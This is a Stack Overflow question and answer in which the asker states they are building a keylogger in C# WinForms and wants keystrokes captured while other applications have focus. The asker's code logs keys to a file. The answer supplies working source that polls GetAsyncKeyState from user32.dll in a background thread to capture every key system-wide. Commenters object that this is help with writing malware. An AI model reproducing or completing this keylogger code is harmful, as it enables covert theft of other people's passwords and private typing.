# how to get key code while focus any window application

Tags: c#, winforms

here i get KeyCode only on Form KeyUp event i want get key code while focus any application of window. actually i m tying to make key logger window application how i get key code when i lost focus on my form.?

```
    private void Form1_KeyUp(object sender, KeyEventArgs e)
    {
        Fun_Val(e);
    }

    private void Fun_Val(KeyEventArgs e)
    {
        switch (e.KeyCode)
        {
            case Keys.Space:
                 cl.Fun_Write(" ");
                break;

            case Keys.Enter:
                 cl.Fun_Write(Environment.NewLine);
                break;

            case Keys.LShiftKey:
                 cl.Fun_Write(" ");
                break;

            case Keys.RShiftKey:
                 cl.Fun_Write(" ");
                break;

            default:
                if (Control.ModifierKeys != Keys.Shift)
                {
                     cl.Fun_Write(e.KeyCode.ToString().ToLower());
                }
                else
                {
                     cl.Fun_Write(e.KeyCode.ToString());
                }
                break;
        }
    }

    public void Fun_Write(string word)
    {
        // filename = DateTime.Now.Month + "-" + DateTime.Now.Day + filename;
        path = Path.Combine(dir, filename);
        DirectoryInfo di = new DirectoryInfo(dir);
        FileInfo fi = new FileInfo(path);
        if (!di.Exists)
        {
            di.Create();

            if (!fi.Exists)
            {
                fi.Create();
            }
        }
        else
        {
            StreamWriter sw = new StreamWriter(path, true);
            sw.Write(word, true);
            sw.Close();
        }
    }
```

Comment: I just downvoted because you are literally asking for help with creating malicious code (or at least asking us to help you with getting it to work). I don't find such questions suitable on Stack Overflow, however what others think about it I don't know.

Answer (score -1):

If you want to add a keylog feature it's easier if you use the `GetAsyncKeyState()` method from user32.dll, adding this to the form source code and create a loop that will keep looking if a key has been pressed. However you first need to create a [thread](https://msdn.microsoft.com/en-us/library/7a2f3ay4(v=vs.90).aspx), so make a new class and call it for example "workThread.cs"

```
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;

class workThread
{
    [DllImport("user32.dll")] //imports function from unmanaged code (requires System.Runtime.InteropServices)
    public static extern int GetAsyncKeyState(Int32 i);

    public workThread() {; } //empty constructor

    public void LogKeys() //the function the thread will do when being called
    {
        while (true)
        {
            //sleeping for while, this will reduce load on cpu
            Thread.Sleep(50);
            for (Int32 i = 0; i < 255; i++)
            {
                int keyState = GetAsyncKeyState(i);
                if (keyState == 1 || keyState == -32767)
                {
                    Fun_Write( ((Keys)i).ToString() );
                }
            }
        }
    }

    public static void Fun_Write(string word)
    {
        //do what you want with the key
    }
}
```

Then just start the thread somewhere in your form with this:

```
workThread worker = new workThread();
Thread workThread = new Thread(worker.LogKeys); //attach the function to the thread
workThread.Start();
```

note: please check your question preview and code indentation before posting the question so that content is more readable and clearer

Comment: Did you just help him make malware?

Comment: You can find this code quite easily around, as making a keylogger is actually quite easy. Deploying it, on the other hand is more difficult

Comment: I am well aware of that, but I still don't know what the Stack Overflow moderators thinks of this; wether helping someone to make malicious code (with the knowledge of doing so) is appreciated/allowed or not.